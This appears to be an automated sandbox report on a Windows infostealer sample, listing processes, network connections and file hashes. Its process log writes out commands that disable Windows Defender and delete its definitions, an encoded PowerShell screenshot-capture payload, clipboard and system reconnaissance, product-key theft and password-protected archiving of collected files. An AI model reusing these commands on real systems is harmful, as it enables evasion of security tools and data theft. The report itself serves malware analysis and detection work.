| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cjmodovl\cjmodovl.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6580.tmp" "c:\Users\Admin\AppData\Local\Temp\cjmodovl\CSCDFC7E7C12BCE4A51BE5DBD8CF3DBD10.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI25282\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\8Svqi.zip" *"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\_MEI25282\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI25282\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\8Svqi.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI25282\python311.dll
| MD5 | 64fe8415b07e0d06ce078d34c57a4e63 |
| SHA1 | dd327f1a8ca83be584867aee0f25d11bff820a3d |
| SHA256 | 5d5161773b5c7cc15bde027eabc1829c9d2d697903234e4dd8f7d1222f5fe931 |
| SHA512 | 55e84a5c0556dd485e7238a101520df451bb7aab7d709f91fdb0709fad04520e160ae394d79e601726c222c0f87a979d1c482ac84e2b037686cde284a0421c4d |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\VCRUNTIME140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
memory/5096-25-0x00007FFE97840000-0x00007FFE97E29000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI25282\base_library.zip
| MD5 | 9dc12ea9f7821873da74c772abb280f0 |
| SHA1 | 3f271c9f54bc7740b95eaa20debbd156ebd50760 |
| SHA256 | c5ec59385bfac2a0ac38abf1377360cd1fddd05c31f8a8b4e44252e0e63acb10 |
| SHA512 | a3175c170bbb28c199ab74ad3116e71f03f124d448bf0e9dd4afcacdc08a7a52284cf858cfd7e72d35bd1e68c6ba0c2a1a0025199aeb671777977ea53e1f2535 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_ctypes.pyd
| MD5 | 26e65481188fe885404f327152b67c5e |
| SHA1 | 6cd74c25cc96fb61fc92a70bdfbbd4a36fda0e3d |
| SHA256 | b76b63e8163b2c2b16e377114d41777041fcc948806d61cb3708db85cca57786 |
| SHA512 | 5b58fc45efebc30f26760d22f5fe74084515f1f3052b34b0f2d1b825f0d6a2614e4edaf0ce430118e6aaaf4bb8fcc540699548037f99a75dd6e53f9816068857 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\libffi-8.dll
| MD5 | 87786718f8c46d4b870f46bcb9df7499 |
| SHA1 | a63098aabe72a3ed58def0b59f5671f2fd58650b |
| SHA256 | 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33 |
| SHA512 | 3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\blank.aes
| MD5 | ea55d3a1748ffe306acf41f8e40f36b8 |
| SHA1 | 8c32bf9b958b576b1fcb8a0871fdb0d3bbdd00d3 |
| SHA256 | a265a607674d83a053bd0d6c293a6d191d012ac979bc1707646104d2ff81a279 |
| SHA512 | da577f2cabcf0748edc1a413079388cac5c9bc13912939e109aa14fa415d3b9041ebf849ce6775d8a2411d81f79f84d433be14debbe53ea3b8647f7e94f29e42 |
memory/5096-48-0x00007FFEAC8E0000-0x00007FFEAC8EF000-memory.dmp
memory/5096-47-0x00007FFEAAAE0000-0x00007FFEAAB04000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_ssl.pyd
